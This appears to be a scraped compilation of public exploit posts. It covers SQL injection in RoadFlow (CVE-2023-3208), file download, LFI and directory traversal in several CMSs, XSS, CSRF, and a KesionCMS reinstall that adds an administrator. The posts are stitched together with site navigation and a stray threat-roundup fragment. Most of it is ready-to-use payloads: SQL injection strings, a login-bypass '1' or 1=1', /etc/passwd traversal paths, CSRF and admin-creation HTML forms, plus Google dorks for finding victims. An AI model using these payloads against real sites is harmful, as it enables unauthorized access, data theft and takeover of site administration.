A vulnerability, which was classified as critical, has been found in RoadFlow Visual Process Engine .NET Core Mvc 2.13.3. Affected by this issue is some unknown functionality of the file /Log/Query?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&tabid=tab_0B73635494734D66B9C015CAC149EB05 of the component Login. The manipulation of the argument sidx/sord leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-231230 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

Permalink

Cannot retrieve contributors at this time

1、Use the default account to log in normally  2、Click log query, use burpsuite to capture packets   3、package： POST /RoadFlowCore/Log/Query?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&tabid=tab\_0B73635494734D66B9C015CAC149EB05 HTTP/1.1 Host: 127.0.0.1:5000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: application/json, text/javascript, _/_; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 116 Origin: http://127.0.0.1:5000 Connection: close Referer: http://127.0.0.1:5000/RoadFlowCore/Log/Index?appid=0B736354-9473-4D66-B9C0-15CAC149EB05&rf\_appopenmodel=0&tabid=tab\_0B73635494734D66B9C015CAC149EB05 Cookie: rf\_login\_uniqueid=C9965CEC-493C-4433-8F81-84267ECAF9BD; rf\_core\_rootdir=; usermenutype=1; rf\_core\_theme=blue; roadflowcorepagesize=15; RoadFlowCore.Session=CfDJ8EvfmoetFvtFn34qbL0bhQi732bT78siA0k9IyuNV7izzD2HaiCszYysIMm3IHL9tKRQYFo3z2VcOb%2Ba7grHTmnatCG6w2h3Ve0ZUYoFBB%2Fnug6MXcNvN6CJrON40GKlvi5uELoiS8mWsxVTkmR1Bpe%2Fn2KtT%2FGnfrgDuJSlMd8T; .AspNetCore.Antiforgery.SqRQVSlQWbo=CfDJ8EvfmoetFvtFn34qbL0bhQiNLjtoCHp8DTQQSTvj4Wzi3rHnvueNRx4iL7I9mxKb1WgacCXdIFkCxyXh520nuIsS3\_NqXifucqHDrhneFPLFspDzv8GeNY-F9Sr7xbTcCfiEOUKwVDAgHp8tTx5DRJI Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin

appid=0B736354-9473-4D66-B9C0-15CAC149EB05&\_search=false&nd=1686014077522&rows=20000&page=1&sidx=WriteTime&sord=desc

4、There is an error injection in the sidx parameter of this package, replace the value of sidx "extractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281205948442%29%29%29"，Successfully broke the md5 value.  5、There is time injection in the sord parameter of this package, replace the value of sord with "desc%2C%28select%2Afrom%28select%2Bsleep%2810%29union%2F%2A%2A%2Fselect%2B1%29a%29"，Successfully delayed by 10 seconds.  6、Use the sqlmap tool to exploit.

CVE-2023-3208: vulhub/RoadFlow.md at master · yangxixx/vulhub

PhotoSwipe version 5.3.7 suffers from an arbitrary file download vulnerability.

    ===========================================================================================| # Title     : PhotoSwipe 5.3.7 Arbitrary File Download Vulnerability                    || # Author    : indoushka                                                                 || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)     | | # Vendor    : https://photoswipe.com/                                                   |  | # Dork      :                                                                           |===========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : download?path=/uploads/images/support/download/index.php[+] Payload enables you to download empty files .[+] https://127.0.0.1/novakon.com.tw/common/frontend/download?path=/uploads/images/support/download/index.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

PhotoSwipe 5.3.7 Arbitrary File Download

KesionCMS X version 9.5 suffers from an unauthenticated add administrator vulnerability.

====================================================================================================================================  
| # Title     : KesionCMS X9.5 Reinstall Add Admin Vulnerability                                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit)                                             |   
| # Vendor    : https://www.kesion.com/                                                                                            |    
| # Dork      : Powered by KesionCMS                                                                                               |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : /install/index.asp

[+] http://127.0.0.1/install/?action=s4 = add your information to login

[+] copy & past this exploit listed below into a text file and save it with ".html" extension

[+] Exploit :

[+] @t Line 09 & 16 change the domain name of target

    <head><title>  
            Hacked By indoushka  
        </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" />  
        <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script>  
        </head>  
        <body>    
 <form name="form" method="post" action="http://127.0.0.1/install/index.asp" id="form">  
        <div class="guide">  
         <div class="guidetitle">  
                </div>  
                <div class="clear"></div>  
              </div>  
          <div class="clear"></div>  
 <input type="hidden" name="action" value="http://www.tzxdcpv.com/install/?action=s5"  />  
       <input type="hidden" name="DBlx" value=""  />  
       <input type="hidden" name="CkbData" value=""  />

              <input type="hidden" name="TxtDBName_a" value=""  />  
       <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden"  />  
       <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" />  
       <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" />  
       <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden"  />

      <div id="http://www.tzxdcpv.com/install/?action=s4">

           </div>  
     <div class="clear"></div>  
     <div class="sjlist">  
      <h5>网站参数配置</h5>  
      <ul>  
        <li><span>网站名称：</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如：Kesion官方站</li>  
        <li><span>网站域名：</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        如http://www.kesion.com。  
        </li>  
        <li><span>安装目录：</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        系统会自动获取，建议不要修改。  
        </li>  
        <li><span>授 权 码：</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text">  
        免费版本用户请留空或填“0”。  
        </li>  
        <li><span>后台目录：</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如：Manage,Admin，后面必须带"/"符号。</li>  
                <li><span> 后台登录验证码：</span>  
                 <input type="radio" name="isCode_a" value="True"  /> 启用    
                 <input type="radio" value="False"  name="isCode_a" checked="checked"/> 不启用  
                </li>

                       <li><span>管理认证码：</span>  
                 <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用  <input onclick="$('#rzm').hide()" type="radio" value="False"  name="isCode" checked="checked"   /> 不启用   
                <font id="rzm" style="display:none">认证码：<input name="TxtManageCode" value="8888"  id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li>  
      </ul>  
      <div class="clear"></div>  
      <h5>填写管理员信息</h5>  
      <ul>  
        <li><span>管理员账号：</span><input name="TxtUserName" value="admin"  id="TxtUserName" class="text" type="text"><font color="red">*</font> </li>  
        <li><span>管理员密码：</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li>  
        <li><span>重复密码：</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li>  
      </ul>  
      <div class="clear blank10"></div>

            <div style="padding:5px">  
      <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit">  
      </div>  
    </div>

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

KesionCMS X 9.5 Add Administrator

Pannres-Idence CMS version 7.3 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Pannres-idence CMS 7.3 CSRF Vulnerability                                                                          |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             |   
| # Vendor    : https://codecanyon.net/item/pannresidence-classified-ads-php-script/19960675?s_rank=189                            |    
| # Dork      : "Bylancer, All right reserved"                                                                                     |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html Will modify the password for the site manager, as well as change the e-mail.

[+] save code as poc.html .

<form class="form-horizontal" action="http://127.0.0.1/pannresidencecom/backend/add_newPassword.php" name="form2" id="form2">

                            <fieldset>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">NEW PASSWORD</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="password" id="password" class="form-control" placeholder="Your new password." type="password">  
                                    </div>  
                                </div>

                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">RE NEW PASSWORD<meta></label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="re_password" id="re_password" class="form-control" placeholder="Re password again." type="password" onchange="check_pass()">

                                    </div>  
                                </div>

                                                <div class="form-group">  
                                    <label class="col-md-2 control-label" for="text-field">CHANGE EMAIL</label>  
                                    <div class="col-md-10" id="thumbsite">  
                                        <input name="newEmail" value="" class="form-control" type="email">

                                    </div>  
                                </div>

                                                            </fieldset>

                            <div class="">  
                                <div class="row">  
                                    <div class="col-md-12">  
                                        <button class="btn btn-default" type="clear">  
                                            Cancel  
                                        </button>

                                        <button class="btn btn-primary" id="submit-form" name="submit-form" type="submit">  
                                            <i class="fa fa-save"></i>  
                                            Submit  
                                        </button>  
                                    </div>  
                                </div>  
                            </div>

                        </form>

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

Pannres-Idence CMS 7.3 Cross Site Request Forgery

Ormesson-Immobilier CMS version 8 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Ormesson-immobilier cms v8 Auth By Pass Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://www.easysolutions.lu/                                                                                      |  | # Dork      : powered by Sogis.be ©                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & Pass : 1' or 1=1 -- -[+] http://127.0.0.1/ormesson/MyGestion/#/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Ormesson-Immobilier CMS 8 SQL Injection

osCommerce version 4 suffers from a local file inclusion vulnerability.

    ====================================================================================================================================| # Title     : oscommerce V4 LFI Vulnerability                                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.oscommerce.com/                                                                                        |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 62  : https://github.com/osCommerce/osCommerce-V4/blob/main/install/index.php[+] http://locqlhost/install/index.php?rootPath=../../includes/local/configure.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

osCommerce 4 Local File Inclusion

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 2 and June 9. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Roundup for June 2 to June 9

P2S CMS version 0.1 suffers from a cross site scripting vulnerability.

**P2S CMS 0.1 Cross Site Scripting**

Posted Jun 9, 2023

Authored by indoushka

P2S CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 7bb6a5d8c0fb7077e0992b71833738c252f38ebb48abe398cde8f60022fba24c

Download | Favorite | View

**P2S CMS 0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : P2s-cms v0.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://www.primestart.net/                                                                                        || # Dork      : index.php?page=busca&palavra=                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  Use Payload : <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/avamcombr/index.php?page=busca&palavra=%3Cscript%3Ealert(/indoushka/);%3C/script%3E        Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,354)
*   Arbitrary (16,067)
*   BBS (2,859)
*   Bypass (1,694)
*   CGI (1,024)
*   Code Execution (7,157)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,317)
*   DoS (23,189)
*   Encryption (2,363)
*   Exploit (51,175)
*   File Inclusion (4,195)
*   File Upload (955)
*   Firewall (821)
*   Info Disclosure (2,720)
*   Intrusion Detection (884)
*   Java (3,002)
*   JavaScript (841)
*   Kernel (6,577)
*   Local (14,393)
*   Magazine (586)
*   Overflow (12,614)
*   Perl (1,423)
*   PHP (5,124)
*   Proof of Concept (2,302)
*   Protocol (3,567)
*   Python (1,509)
*   Remote (30,515)
*   Root (3,556)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,854)
*   Shell (3,163)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,234)
*   TCP (2,394)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,597)
*   Web (9,571)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,693)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,979)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,920)
*   Debian (6,758)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (344)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,866)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,370)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,652)
*   UNIX (9,246)
*   UnixWare (186)
*   Windows (6,557)
*   Other

P2S CMS 0.1 Cross Site Scripting

MVC Shop version 0.5 suffers from a directory traversal vulnerability.

====================================================================================================================================| # Title     : mvc-shop v0.5 Directory Traversal Vulnerability Vulnerability                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://github.com/tanhongit/new-mvc-shop/releases/tag/v0.5                                                        || # Dork      :                                                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  infested file : index.php & admin.php<?phpsession_start();require_once('lib/model.php');require_once('lib/functions.php');require_once('content/models/cart.php');require "lib/statistics.php";require "lib/counter.php";// $count_file = 'logs/counter.txt';// $ip_file = 'logs/ip.txt';// function counting_ip()// {//     $ip = $_SERVER['REMOTE_ADDR'];//     global $count_file, $ip_file;//     if (!in_array($ip, file($ip_file, FILE_IGNORE_NEW_LINES))) {//         $current_val = (file_exists($count_file)) ? file_get_contents($count_file) : 0;//         file_put_contents($ip_file, $ip . "\n", FILE_APPEND);//         file_put_contents($count_file, ++$current_val);//     }// }// counting_ip();if (isset($_GET['controller'])) $controller = $_GET['controller'];else $controller = 'home';if (isset($_GET['action'])) $action = $_GET['action'];else $action = 'index';$file = 'content/controllers/' . $controller . '/' . $action . '.php';if (file_exists($file)) {    require($file);} else {    show_404();}[+]  use payload : ../../../../../../../../../etc/passwd[+]  https://127.0.0.1/chikoiquan.tanhongitcom/index.php?action=../../../../../../../../../etc/passwd[+]  https://127.0.0.1/https://chikoiquan.tanhongitcom/admin.php?file=../../../../../../../../../etc/passwd== Greetings to :===========================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |        ============================================================================================

MVC Shop 0.5 Directory Traversal

PHP Live version 3.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : PHP Live 3.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0.3(32-bit)                                             | | # Vendor    : https://www.phplivesupport.com                                                                                     |  | # Dork      : "powered by PHP Live! "                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /message_box.php?action=submit&deptid=1 AND 3*2*1%3d6 AND 556%3d556&email=sample%40email.tst&l=e-assis&message=20&name=xtmxbmyr&requestid=&send=Enviar Email&subject=1&x=1[+] Test : http://127.0.0.1/cestaseflorescriscombr/chat/message_box.php?action=submit&deptid=1%20AND%203*2*1%3d6%20AND%20556%3d556&email=sample%40email.tst&l=e-assis&message=20&name=xtmxbmyr&requestid=&send=Enviar%20Email&subject=1&x=1 .Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

Tag

#firefox